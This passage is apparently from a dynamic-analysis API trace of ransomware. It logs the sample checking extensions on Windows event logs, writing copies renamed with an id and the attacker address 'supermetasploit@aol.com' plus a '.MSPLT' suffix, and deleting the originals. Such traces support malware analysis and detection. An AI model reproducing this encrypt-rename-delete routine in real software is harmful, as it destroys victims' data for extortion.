(lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.185] lstrlenW (lpString=".1cd") returned 4 [0293.185] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 82 [0293.185] lstrlenW (lpString=".jpg") returned 4 [0293.185] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.186] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.186] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 46 [0293.186] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.186] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0293.186] CloseHandle (hObject=0x488) returned 1 [0293.186] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 0x20 [0293.187] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.187] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.187] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.187] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.187] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0293.188] GetLastError () returned 0x0 [0293.188] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.201] WriteFile (in: hFile=0x48c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.204] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.204] WriteFile (in: hFile=0x48c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x130, lpOverlapped=0x0) returned 1 [0293.205] SetEndOfFile (hFile=0x48c) returned 1 [0293.205] CloseHandle (hObject=0x48c) returned 1 [0293.213] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.213] SetEndOfFile (hFile=0x488) returned 1 [0293.215] CloseHandle (hObject=0x488) returned 1 [0293.215] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.215] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx")) returned 1 [0293.216] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.216] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.216] lstrlenW (lpString=".doc") returned 4 [0293.216] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".docx") returned 5 [0293.216] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.216] lstrlenW (lpString=".pdf") returned 4 [0293.216] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".xls") returned 4 [0293.216] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".xlsx") returned 5 [0293.216] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.216] lstrlenW (lpString=".ppt") returned 4 [0293.216] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.216] lstrlenW (lpString=".zip") returned 4 [0293.216] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".rar") returned 4 [0293.216] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".bz2") returned 4 [0293.216] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.216] lstrlenW (lpString=".7z") returned 3 [0293.216] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.216] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.216] lstrlenW (lpString=".dbf") returned 4 [0293.217] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.217] lstrlenW (lpString=".1cd") returned 4 [0293.217] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.217] lstrlenW (lpString=".jpg") returned 4 [0293.217] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.217] lstrlenW (lpString=".doc") returned 4 [0293.217] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString=".docx") returned 5 [0293.217] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.217] lstrlenW (lpString=".pdf") returned 4 [0293.217] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString=".xls") returned 4 [0293.217] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString=".xlsx") returned 5 [0293.217] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.217] lstrlenW (lpString=".ppt") returned 4 [0293.217] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.217] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.217] lstrlenW (lpString=".zip") returned 4 [0293.218] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.218] lstrlenW (lpString=".rar") returned 4 [0293.218] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.218] lstrlenW (lpString=".bz2") returned 4 [0293.218] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.218] lstrlenW (lpString=".7z") returned 3 [0293.218] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.218] lstrlenW (lpString=".dbf") returned 4 [0293.218] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.218] lstrlenW (lpString=".1cd") returned 4 [0293.218] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.218] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0293.218] lstrlenW (lpString=".jpg") returned 4 [0293.218] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.218] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.218] lstrlenW (lpString="Microsoft-Windows-SMBClient%4Operational.evtx") returned 45 [0293.218] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.219] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0293.219] CloseHandle (hObject=0x488) returned 1 [0293.219] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 0x20 [0293.219] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.219] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.219] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.220] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.220] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0293.603] GetLastError () returned 0x0 [0293.603] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.632] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.635] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.635] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x12e, lpOverlapped=0x0) returned 1 [0293.636] SetEndOfFile (hFile=0x47c) returned 1 [0293.636] CloseHandle (hObject=0x47c) returned 1 [0293.639] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.639] SetEndOfFile (hFile=0x488) returned 1 [0293.641] CloseHandle (hObject=0x488) returned 1 [0293.641] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.641] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 1 [0293.641] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.642] lstrlenW (lpString=".doc") returned 4 [0293.642] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".docx") returned 5 [0293.642] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.642] lstrlenW (lpString=".pdf") returned 4 [0293.642] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".xls") returned 4 [0293.642] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".xlsx") returned 5 [0293.642] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.642] lstrlenW (lpString=".ppt") returned 4 [0293.642] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.642] lstrlenW (lpString=".zip") returned 4 [0293.642] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".rar") returned 4 [0293.642] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".bz2") returned 4 [0293.642] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString=".7z") returned 3 [0293.642] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.642] lstrlenW (lpString=".dbf") returned 4 [0293.642] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.642] lstrlenW (lpString=".1cd") returned 4 [0293.642] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.643] lstrlenW (lpString=".jpg") returned 4 [0293.643] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.643] lstrlenW (lpString=".doc") returned 4 [0293.643] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".docx") returned 5 [0293.643] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.643] lstrlenW (lpString=".pdf") returned 4 [0293.643] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".xls") returned 4 [0293.643] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".xlsx") returned 5 [0293.643] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.643] lstrlenW (lpString=".ppt") returned 4 [0293.643] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.643] lstrlenW (lpString=".zip") returned 4 [0293.643] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".rar") returned 4 [0293.643] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".bz2") returned 4 [0293.643] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.643] lstrlenW (lpString=".7z") returned 3 [0293.643] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.644] lstrlenW (lpString=".dbf") returned 4 [0293.644] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.644] lstrlenW (lpString=".1cd") returned 4 [0293.644] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0293.644] lstrlenW (lpString=".jpg") returned 4 [0293.644] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.644] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.644] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Audit.evtx") returned 39 [0293.644] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.645] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0293.645] CloseHandle (hObject=0x488) returned 1 [0293.645] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 0x20 [0293.645] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.645] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.645] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.645] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.645] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0293.648] GetLastError () returned 0x0 [0293.648] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.676] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.679] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.679] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x122, lpOverlapped=0x0) returned 1 [0293.680] SetEndOfFile (hFile=0x47c) returned 1 [0293.680] CloseHandle (hObject=0x47c) returned 1 [0293.684] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.684] SetEndOfFile (hFile=0x488) returned 1 [0293.686] CloseHandle (hObject=0x488) returned 1 [0293.686] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.686] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 1 [0293.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.686] lstrlenW (lpString=".doc") returned 4 [0293.686] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.686] lstrlenW (lpString=".docx") returned 5 [0293.687] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.687] lstrlenW (lpString=".pdf") returned 4 [0293.687] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".xls") returned 4 [0293.687] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".xlsx") returned 5 [0293.687] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.687] lstrlenW (lpString=".ppt") returned 4 [0293.687] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString=".zip") returned 4 [0293.687] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".rar") returned 4 [0293.687] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".bz2") returned 4 [0293.687] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".7z") returned 3 [0293.687] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString=".dbf") returned 4 [0293.687] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString=".1cd") returned 4 [0293.687] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString=".jpg") returned 4 [0293.687] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.687] lstrlenW (lpString=".doc") returned 4 [0293.687] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.687] lstrlenW (lpString=".docx") returned 5 [0293.688] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.688] lstrlenW (lpString=".pdf") returned 4 [0293.688] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString=".xls") returned 4 [0293.688] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString=".xlsx") returned 5 [0293.688] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.688] lstrlenW (lpString=".ppt") returned 4 [0293.688] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.688] lstrlenW (lpString=".zip") returned 4 [0293.688] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString=".rar") returned 4 [0293.688] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString=".bz2") returned 4 [0293.688] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString=".7z") returned 3 [0293.688] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.688] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.688] lstrlenW (lpString=".dbf") returned 4 [0293.688] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.688] lstrlenW (lpString=".1cd") returned 4 [0293.688] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.688] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0293.688] lstrlenW (lpString=".jpg") returned 4 [0293.688] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.688] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.688] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Operational.evtx") returned 45 [0293.689] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.689] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0293.689] CloseHandle (hObject=0x488) returned 1 [0293.689] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 0x20 [0293.689] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.689] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0293.689] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, 